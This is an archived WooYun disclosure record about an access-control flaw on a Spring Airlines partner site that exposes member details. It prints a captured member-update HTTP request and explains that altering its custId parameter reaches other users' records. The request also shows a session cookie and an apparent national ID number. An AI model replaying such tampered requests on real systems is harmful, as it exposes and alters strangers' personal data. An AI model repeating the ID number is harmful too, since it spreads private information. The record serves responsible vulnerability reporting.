当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-058964

漏洞标题:春秋航空某处设计缺陷可遍历用户信息之三

相关厂商:春秋航空

漏洞作者:

提交时间:2014-04-30 11:02

修复时间:2014-06-14 11:03

公开时间:2014-06-14 11:03

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-30: 细节已通知厂商并且等待厂商处理中
2014-04-30: 厂商已经确认,细节仅向厂商公开
2014-05-10: 细节向核心白帽子及相关领域专家公开
2014-05-20: 细节向普通白帽子公开
2014-05-30: 细节向实习白帽子公开
2014-06-14: 细节向公众公开

简要描述:

#3遍历用户信息

详细说明:

WooYun: 春秋航空某处设计缺陷可遍历用户信息
看了一下,之前提的这个厂商处理的很快,已经修复..
但是后续测试发现新问题..
春秋航空官方网站-商旅通官网-春秋旅游
这三个站点的用户是相通的,可以互登..包括会员信息也是一样
www.moneyok.cn 问题出现在商旅通官网

c7.jpg


c1.jpg


登录帐号-会员信息修改-保存信息的时候抓包

c2.jpg


POST /member/update HTTP/1.1
Host: www.moneyok.cn
Connection: keep-alive
Content-Length: 226
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://www.moneyok.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://www.moneyok.cn/member/memberInfo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=2243B3792583EEA5E86F76AABF711DAC; CNZZDATA5044812=cnzz_eid%3D608192325-1398696211-null%26ntime%3D1398825976%26cnzz_a%3D39%26sin%3Dnone%26ltime%3D1398825383505%26rtime%3D2
custId=9C0202348612&email=XXXXX%40126.com&familyName=%E8%80%81%E7%8E%8B&sex=1&birthday=&cardTypeId=1&simText-cardTypeId=%E8%BA%AB%E4%BB%BD%E8%AF%81&IDNO=511702197701193532&personalName=&tel=&address=&zip=&ifEmail=Y


修改此处的custId

c3.jpg


c4.jpg


c5.jpg


c6.jpg

漏洞证明:

#可自查

修复方案:

问题还是老问题,只是希望你们不要指哪补哪..

版权声明:转载请注明来源 @乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-04-30 11:10

厂商回复:

已收到并尽快盘查修复,非常感谢,辛苦了。
您的问题提出我们十分重视,谢谢。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-04-30 11:24 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    @春秋航空 不谢,乌云好厂商